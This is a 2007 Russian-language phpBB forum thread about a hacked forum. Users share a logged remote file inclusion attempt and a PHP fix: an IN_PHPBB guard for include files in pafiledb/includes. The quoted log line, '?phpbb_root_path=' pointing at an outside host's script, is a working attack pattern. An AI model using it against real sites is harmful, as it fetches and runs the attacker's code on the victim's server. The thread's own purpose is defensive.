Взломали форум

Gosudar · Сообщение **Gosudar** » 07.10.2007 20:26

Да кстати, я попытки взлома пишу в лог файл
вот один пыталяся :
?phpbb_root_path=http://godsteam.org/echo3?
сволочь пасс хотел.
godsteam.org настучать что ли на них?

Rayden · Сообщение **Rayden** » 07.10.2007 22:26

Я думаю, если есть возмоность/желание - обязательно надо. Такие вещи не должны безнаказанно проходить.

Gosudar · Сообщение **Gosudar** » 07.10.2007 22:48

deleted

Rayden · Сообщение **Rayden** » 07.10.2007 23:27

Портянку убери, запрещено правилами.

Сообщение **Siava** » 08.10.2007 0:12

Rayden
Какая ж это портянка?

Rayden · Сообщение **Rayden** » 08.10.2007 8:51

Больше 25 строк.

Сообщение **Xpert** » 08.10.2007 8:53

Есть аналогичные дыры которые тут лечили, применительно к KB Mod, который тоже является частью портала.

Jovani · Сообщение **Jovani** » 08.10.2007 11:39

По идее, достаточно, сделать проверку как в других аналогичных файлах, то есть, в начале файла, после копирайтов, добавить:

Код: Выделить всё

if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}

Кстати, от греха подальше, аналогично сделать с другими файлами в этой директории pafiledb/includes

Neonaft · Сообщение **Neonaft** » 08.10.2007 20:04

А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?

tematika · Сообщение **tematika** » 08.10.2007 20:50

А чем это опасно? На одном форуме вылазит Hacking attempt! На другом ничего.

Jovani · Сообщение **Jovani** » 09.10.2007 7:23

Neonaft писал(а):А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?

В тех, которые не должны исполняться отдельно от phpbb, то есть в "подключаемых".